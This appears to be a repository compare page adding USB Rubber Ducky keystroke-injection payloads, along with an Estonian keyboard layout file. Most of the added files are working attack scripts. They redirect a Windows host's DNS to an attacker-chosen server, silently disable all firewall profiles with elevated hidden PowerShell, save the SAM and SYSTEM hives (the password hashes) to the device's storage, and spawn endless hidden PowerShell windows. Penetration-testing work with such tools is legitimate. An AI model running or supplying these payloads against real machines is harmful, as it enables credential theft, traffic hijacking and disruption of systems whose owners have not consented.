hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: hak5:e1029b94f056493c2a1c8860922617a54c22ab79
Branches Tags
hak5:master
hak5:improve-duckylogger
hak5:more_extensions
hak5:add-docs
...
compare: hak5:d2725f40e6eb70db7c9c3eafa71b083b0804828e
Branches Tags
hak5:master
hak5:improve-duckylogger
hak5:more_extensions
hak5:add-docs

24 Commits
e1029b94f0 ... d2725f40e6

Author SHA1 Message Date
&MF#CTg*fWz6H^nV d2725f40e6
Merge d23dc1884d into f3053273a4 2024-11-12 10:43:09 -05:00
Peaks f3053273a4
Merge pull request #493 from aleff-github/patch-95 
Windows Spam Terminals
 2024-11-08 06:24:15 -05:00
Peaks d5e02033fe
Merge pull request #498 from brunoooost/master 
Adding RickRoll-Contact-iOS
 2024-11-07 05:20:00 -05:00
bst04 b2b8cf8b2e changing category 2024-11-06 11:48:33 +01:00
Peaks 3333420b26
Merge pull request #497 from luu176/master 
Deactivate/Disable Windows Firewall
 2024-11-05 15:08:33 -05:00
bst04 8cd44e511c eliminate other payload 2024-11-04 15:03:31 +01:00
bst04 bad6fb6040 Adding Send-WhatsApp-Messages-MacOS to prank category 2024-11-04 15:02:21 +01:00
bst04 9c3f29df37 Adding RickRoll-Contact-iOS 2024-11-04 14:58:00 +01:00
Luu 3604620ab9
Create README.md 2024-11-04 13:00:57 +01:00
Luu 261e82a829
Create payload.txt 2024-11-04 13:00:31 +01:00
Peaks 5f13d6090f
Merge pull request #496 from luu176/master 
DNS spoofer
 2024-11-04 06:12:30 -05:00
Luu 1a1c79d5ba
Create payload.txt 2024-11-02 14:58:12 +01:00
Luu 203d986ae4
Create README.md 2024-11-02 14:57:52 +01:00
Peaks 6ae414c545
Merge pull request #495 from luu176/master 
Exfiltrate NTLM hash files onto Rubber Ducky's SD card
 2024-11-02 05:33:29 -04:00
Luu aeffdbfcbd
Delete payloads/library/execution/DNS_spoofer/payload.txt 2024-11-01 22:41:30 +01:00
Luu 9a5857b2af
Delete payloads/library/execution/DNS_spoofer/README.txt 2024-11-01 22:40:51 +01:00
Luu aa5afab7ed
Rename payload.txt to payload.txt 2024-11-01 15:42:11 +01:00
Luu f6fb02fe34
Create README.txt 2024-11-01 15:41:50 +01:00
Luu 0bb2f83a10
Create payload.txt 2024-11-01 15:32:44 +01:00
Luu 4a6e17773d
Update README.md 2024-10-31 12:58:23 +01:00
Luu 81ae8f0e8c
Create README.md 2024-10-31 12:56:53 +01:00
Luu 554b3066b7
Create payload.txt 2024-10-31 12:46:27 +01:00
Aleff 47fa68ecd9 Windows Spam Terminals 2024-10-31 08:16:18 +01:00
Hyperadministrator d23dc1884d Add estonian language 2024-10-28 16:38:10 +02:00
11 changed files with 745 additions and 0 deletions
Show Stats Expand all files Collapse all files

173
languages/ee.json Normal file
View File

@ -0,0 +1,173 @@
{
"__comment": "All numbers here are in hex format and 0x is ignored.",
"__comment": " ",
"__comment": "This list is in ascending order of 3rd byte (HID Usage ID).",
"__comment": " See section 10 Keyboard/Keypad Page (0x07)",
"__comment": " of document USB HID Usage Tables Version 1.12.",
"__comment": " ",
"__comment": "Definition of these 3 bytes can be found",
"__comment": " in section B.1 Protocol 1 (Keyboard)",
"__comment": " of document Device Class Definition for HID Version 1.11",
"__comment": " - byte 1: Modifier keys",
"__comment": " - byte 2: Reserved",
"__comment": " - byte 3: Keycode 1",
"__comment": " ",
"__comment": "Both documents can be obtained from link here",
"__comment": " http://www.usb.org/developers/hidpage/",
"__comment": " ",
"__comment": "A = LeftShift + a, { = LeftShift + [",
"__comment": " ",
"0": "00,00,27",
"1": "00,00,1e",
"2": "00,00,1f",
"3": "00,00,20",
"4": "00,00,21",
"5": "00,00,22",
"6": "00,00,23",
"7": "00,00,24",
"8": "00,00,25",
"9": "00,00,26",
"CTRL": "01,00,00",
"CONTROL": "01,00,00",
"SHIFT": "02,00,00",
"ALT": "04,00,00",
"GUI": "08,00,00",
"WINDOWS": "08,00,00",
"COMMAND": "08,00,00",
"a": "00,00,04",
"A": "02,00,04",
"b": "00,00,05",
"B": "02,00,05",
"c": "00,00,06",
"C": "02,00,06",
"d": "00,00,07",
"D": "02,00,07",
"e": "00,00,08",
"E": "02,00,08",
"f": "00,00,09",
"F": "02,00,09",
"g": "00,00,0a",
"G": "02,00,0a",
"h": "00,00,0b",
"H": "02,00,0b",
"i": "00,00,0c",
"I": "02,00,0c",
"j": "00,00,0d",
"J": "02,00,0d",
"k": "00,00,0e",
"K": "02,00,0e",
"l": "00,00,0f",
"L": "02,00,0f",
"m": "00,00,10",
"M": "02,00,10",
"n": "00,00,11",
"N": "02,00,11",
"o": "00,00,12",
"O": "02,00,12",
"p": "00,00,13",
"P": "02,00,13",
"q": "00,00,14",
"Q": "02,00,14",
"r": "00,00,15",
"R": "02,00,15",
"s": "00,00,16",
"S": "02,00,16",
"t": "00,00,17",
"T": "02,00,17",
"u": "00,00,18",
"U": "02,00,18",
"v": "00,00,19",
"V": "02,00,19",
"w": "00,00,1a",
"W": "02,00,1a",
"x": "00,00,1b",
"X": "02,00,1b",
"y": "00,00,1c",
"Y": "02,00,1c",
"z": "00,00,1d",
"Z": "02,00,1d",
"õ": "00,00,30",
"Õ": "02,00,30",
"ä": "00,00,34",
"Ä": "02,00,34",
"ö": "00,00,33",
"Ö": "02,00,33",
"ü": "00,00,2F",
"Ü": "02,00,2F",
"!": "02,00,1e",
"@": "E6,00,1f",
"#": "02,00,20",
"$": "E6,00,21",
"€": "E6,00,08",
"£": "E6,00,20",
"%": "02,00,22",
"^": "E6,00,34",
"&": "02,00,23",
"*": "02,00,31",
"(": "02,00,25",
")": "02,00,26",
"ENTER": "00,00,28",
"ESC": "00,00,29",
"ESCAPE": "00,00,29",
"BACKSPACE": "00,00,2a",
"TAB": "00,00,2b",
"SPACE": "00,00,2c",
" ": "00,00,2c",
"-": "00,00,38",
"_": "02,00,38",
"=": "02,00,27",
"+": "00,00,2d",
"[": "E6,00,25",
"{": "E6,00,24",
"]": "E6,00,26",
"}": "E6,00,27",
"\\": "E6,00,2D",
"|": "E6,00,38",
";": "02,00,36",
":": "02,00,37",
"\"": "02,00,1f",
"'": "00,00,31",
"`": "E5,00,2E",
"~": "02,00,35",
",": "00,00,36",
"<": "E6,00,36",
".": "00,00,37",
">": "E6,00,37",
"/": "02,00,24",
"?": "02,00,2D",
"CAPSLOCK": "00,00,39",
"F1": "00,00,3a",
"F2": "00,00,3b",
"F3": "00,00,3c",
"F4": "00,00,3d",
"F5": "00,00,3e",
"F6": "00,00,3f",
"F7": "00,00,40",
"F8": "00,00,41",
"F9": "00,00,42",
"F10": "00,00,43",
"F11": "00,00,44",
"F12": "00,00,45",
"PRINTSCREEN": "00,00,46",
"SCROLLLOCK": "00,00,47",
"PAUSE": "00,00,48",
"BREAK": "00,00,48",
"INSERT": "00,00,49",
"HOME": "00,00,4a",
"PAGEUP": "00,00,4b",
"DELETE": "00,00,4c",
"DEL": "00,00,4c",
"END": "00,00,4d",
"PAGEDOWN": "00,00,4e",
"RIGHTARROW": "00,00,4f",
"RIGHT": "00,00,4f",
"LEFTARROW": "00,00,50",
"LEFT": "00,00,50",
"DOWNARROW": "00,00,51",
"DOWN": "00,00,51",
"UPARROW": "00,00,52",
"UP": "00,00,52",
"NUMLOCK": "00,00,53",
"MENU": "00,00,65",
"APP": "00,00,65"
}

27
payloads/library/execution/DNS_spoofer/README.md Normal file
View File

@ -0,0 +1,27 @@
# Spoof DNS - Windows ✅
DNS Spoofer
## Description
A payload used to alter the machines DNS settings, redirecting its DNS requests to an attacker-controlled server that can serve deceptive IP addresses for targeted domains.
### Settings
* Set the primary and secondary dns servers
## Credits
<h2 align="center"> Luu176 </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/luu176">
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
</a>
<br>Github
</td>
</tr>
</table>
</div>

69
payloads/library/execution/DNS_spoofer/payload.txt Normal file
View File

@ -0,0 +1,69 @@
REM Title: DNS changer
REM Author: luu176
REM Description: Changes DNS address of windows machine in powershell
REM Target: Windows 10/11
REM wifi interface should be named: Wi-Fi
DEFINE #interface Ethernet
DEFINE #primaryDNS 192.168.1.3
DEFINE #secondaryDNS 1.1.1.1
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
SAVE_HOST_KEYBOARD_LOCK_STATE
GUI r
DELAY 150
STRINGLN powershell Start-Process powershell -Verb runAs
DELAY 800
ALT y
DELAY 500
STRINGLN Set-DnsClientServerAddress -InterfaceAlias "#interface" -ServerAddresses ("#primaryDNS", "#secondaryDNS"); exit
REM below is to blink the LED when payload done
VAR $i = 0
WHILE ( $i < 9 )
DELAY 150
CAPSLOCK
$i = ( $i + 1 )
END_WHILE
RESTORE_HOST_KEYBOARD_LOCK_STATE

23
payloads/library/execution/Firewall_Deactivator/README.md Normal file
View File

@ -0,0 +1,23 @@
# Firewall Deactivator - Windows ✅
Deactivate firewall on windows
## Description
A payload used to deactivate all firewalls on windows in a discrete manner.
## Credits
<h2 align="center"> Luu176 </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/luu176">
<img src="https://avatars.githubusercontent.com/u/112649910?v=4?raw=true" width="48" height="48" />
</a>
<br>Github
</td>
</tr>
</table>
</div>

61
payloads/library/execution/Firewall_Deactivator/payload.txt Normal file
View File

@ -0,0 +1,61 @@
REM Title: Firewall deactivator
REM Author: luu176
REM Description: Deactivate all firewalls in windows machine using hidden powershell
REM Target: Windows
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 200
STRINGLN powershell -Command "Start-Process powershell -ArgumentList '-Command Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False' -Verb RunAs -WindowStyle Hidden"
DELAY 800
ALT y
SAVE_HOST_KEYBOARD_LOCK_STATE
VAR $i = 0
WHILE ( $i < 9 )
DELAY 150
CAPSLOCK
$i = ( $i + 1 )
END_WHILE
RESTORE_HOST_KEYBOARD_LOCK_STATE

29
payloads/library/exfiltration/NTLM_ducky/README.md Normal file
View File

@ -0,0 +1,29 @@
# Exfiltrate NTLM Hash - Windows ✅
A Rubber Ducky payload to exfiltrate NTLM hash files from a Windows machine onto the SD card.
## Description
This payload script captures and <strong>exfiltrates NTLM hash files</strong> from a Windows machine. It uses PowerShell commands to locate and save the SAM and SYSTEM files, which contain hashed user passwords, <strong><u>onto the Rubber Ducky's SD card</u></strong> for later extraction and analysis. Upon successful file extraction, <strong> the payload triggers a visual confirmation by <u>blinking the Caps Lock LED</u> </strong>
### Settings
- **Drive Label:** Set the target drive label for Rubber Ducky storage (default: `DUCKY`).
- **Blink Count:** Adjust the number of Caps Lock LED blinks by setting the `#numBlinks` variable (default is 9 blinks).
## Credits
<h2 align="center"> Luu176 </h2>
<div align="center">
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/luu176">
<img src="https://avatars.githubusercontent.com/u/112649910?v=4" width="48" height="48" />
</a>
<br>GitHub
</td>
</tr>
</table>
</div>

81
payloads/library/exfiltration/NTLM_ducky/payload.txt Normal file
View File

@ -0,0 +1,81 @@
REM_BLOCK
TITLE Exfiltrate NTLM Hash Files onto Ducky Storage
AUTHOR Luu176
DESCRIPTION This payload exfiltrates NTLM hash files (which contain hashed passwords for users
on the current Windows device) to the Rubber Ducky's SD card for further analysis.
It utilizes PowerShell commands to locate and save NTLM files (SAM and SYSTEM) to
the defined storage drive on the Ducky device.
END_REM
DEFINE #driveLabel DUCKY
REM below you can set the number of blinks for the caps lock when finished (default 9)
DEFINE #numBlinks 9
ATTACKMODE HID STORAGE
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
SAVE_HOST_KEYBOARD_LOCK_STATE
IF ($_CAPSLOCK_ON == TRUE)
CAPSLOCK
END_IF
GUI d
DELAY 1000
GUI r
DELAY 500
STRINGLN powershell Start-Process powershell -Verb runAs
DELAY 800
ALT y
DELAY 800
STRINGLN cd (gwmi win32_volume -f 'label=''#driveLabel''').Name;reg save hklm\sam SAM;reg save hklm\system SYS;(New-Object -ComObject wscript.shell).SendKeys('{CAPSLOCK}');exit
GUI d
WAIT_FOR_CAPS_ON
REM once finished downloading SAM and SYSTEM, caps lock LED turn on and then flash (note: may take a couple minutes max to download)
VAR $i = 0
WHILE ( $i < #numBlinks )
DELAY 150
CAPSLOCK
$i = ( $i + 1 )
END_WHILE
RESTORE_HOST_KEYBOARD_LOCK_STATE

66
payloads/library/mobile/iOS/RickRoll-Contact-iOS/README.md Normal file
View File

@ -0,0 +1,66 @@
# Create RickRoll Contact - iOS
This payload is a prank script designed to create a contact named "Ricky Astley" (a nod to the "RickRoll" meme) on an iOS device. It utilizes a dynamic delay mechanism to ensure the system is ready before executing commands. The automated process opens the Contacts app, creates a new contact, and fills in various fields with predefined information: name, last name, phone number, email, website, and other optional details. The fake contact serves as a lighthearted prank, silently inserting a “RickRoll” in the form of a contact entry.
### Details
- **Title**: Create RickRoll Contact
- **Author**: bst04 - Aleff
- **Version**: 1.0
- **Category**: Prank
- **Target**: iOS devices
### Dependencies
- We believe that these 4 pieces of information are critical to making contact, even if it is for fun.
```
DEFINE #CONTACTS-APP-NAME Contacts
DEFINE #CONTACT-NAME Ricky
DEFINE #CONTACT-LAST-NAME Astley
DEFINE #CONTACT-PHONE-NUMBER +1(111)111-1111
```
- Other optional DEFINEs
```
DEFINE #CONTACT-COMPANY example
DEFINE #CONTACT-E-MAIL example
DEFINE #CONTACT-WEBSITE-URL example
DEFINE #CONTACT-BIRTHDAY example
DEFINE #CONTACT-STREET example
DEFINE #CONTACT-CITY example
DEFINE #CONTACT-STATE example
DEFINE #CONTACT-ZIP example
DEFINE #CONTACT-COUNTRY example
```
- Note that if you don't want to set some settings you have to remove the piece of code that sets it as well, for istance...
If you want to remove the zip contact info, you should change this one piece of code from this...
```
REM zip
DELAY 250
STRING #CONTACT-ZIP
TAB
```
... to this...
```
REM zip
DELAY 250
REM STRING #CONTACT-ZIP
TAB
```
In this way you are going to ignore this step but without altering the proper flow of available information.
### How It Works
1. Sets a user-defined options.
2. Uses an extension (`EXTENSION DETECT_READY`) to detect when the device is ready with just a littebit more delay...
3. After readiness is confirmed, the script:
- Runs commands to open **Contacts**.
- Executes some commands to sets the new contact information

135
payloads/library/mobile/iOS/RickRoll-Contact-iOS/payload.txt Normal file
View File

@ -0,0 +1,135 @@
REM_BLOCK
############################################
# #
# Title : Create RickRoll Contact #
# Author : bst04 - Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : iOS #
# #
############################################
END_REM
REM @@@ START MANDATORY DEFINEs @@@
REM We believe that these 4 pieces of information are critical to making contact, even if it is for fun.
DEFINE #CONTACTS-APP-NAME Contacts
DEFINE #CONTACT-NAME Ricky
DEFINE #CONTACT-LAST-NAME Astley
DEFINE #CONTACT-PHONE-NUMBER +1(111)111-1111
REM @@@ START OPTIONAL DEFINEs @@@
DEFINE #CONTACT-COMPANY example
DEFINE #CONTACT-E-MAIL example
DEFINE #CONTACT-WEBSITE-URL example
DEFINE #CONTACT-BIRTHDAY example
DEFINE #CONTACT-STREET example
DEFINE #CONTACT-CITY example
DEFINE #CONTACT-STATE example
DEFINE #CONTACT-ZIP example
DEFINE #CONTACT-COUNTRY example
REM @@@ START PAYLOAD @@@
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
REM Another pinch of delay in accordance with https://shop.hak5.org/blogs/usb-rubber-ducky/detect-ready
DELAY 200
GUI SPACE
DELAY 250
STRINGLN #CONTACTS-APP-NAME
DELAY 500
GUI n
REM name
DELAY 250
STRING #CONTACT-NAME
TAB
REM last name
DELAY 250
STRING #CONTACT-LAST-NAME
TAB
REM company
DELAY 250
STRING #CONTACT-COMPANY
TAB
REM phone number
DELAY 250
STRING #CONTACT-PHONE-NUMBER
TAB
TAB
REM mail
DELAY 250
STRING #CONTACT-E-MAIL
TAB
TAB
REM url
DELAY 250
STRING #CONTACT-WEBSITE-URL
TAB
TAB
REM birthday
DELAY 250
STRING #CONTACT-BIRTHDAY
TAB
TAB
REM street
DELAY 250
STRING #CONTACT-STREET
TAB
REM city
DELAY 250
STRING #CONTACT-CITY
TAB
REM state
DELAY 250
STRING #CONTACT-STATE
TAB
REM zip
DELAY 250
STRING #CONTACT-ZIP
TAB
REM country/region
DELAY 250
STRING #CONTACT-COUNTRY
TAB
GUI q

23
payloads/library/prank/Windows-Spam-Terminals/README.md Normal file
View File

@ -0,0 +1,23 @@
# Windows Spam Terminals
This script is designed to work on Windows devices. It opens an infinite number of PowerShell terminals, effectively spamming the system with terminal instances.
Be very careful about using this payload as this activity could alter the state of the computer by causing unsaved data to be lost. For this reason make sure you are authorized before running this script otherwise you may risk a loss of data.
### Details
- **Title**: Windows Spam Terminals
- **Author**: bst04 - Aleff
- **Version**: 1.0
- **Category**: Prank
- **Target**: Windows
### Dependencies
This payload is plug and play <3
## How It Works 📜
1. Uses an extension (`EXTENSION PASSIVE_WINDOWS_DETECT`) to detect when the device is ready
2. After readiness is confirmed, the script execute a powershell script that create an infinite number of PowerShell terminals

58
payloads/library/prank/Windows-Spam-Terminals/payload.txt Normal file
View File

@ -0,0 +1,58 @@
REM_BLOCK
############################################
# #
# Title : Windows Spam Terminals #
# Author : bst04 - Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows #
# #
############################################
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 500
STRINGLN powershell -w h -Command "while ($true) { Start-Process powershell -ArgumentList '-NoExit', '-Command', 'Start-Process powershell -w h -ArgumentList \"-NoExit\", \"-Command\", \"Start-Process powershell -w h\"' }"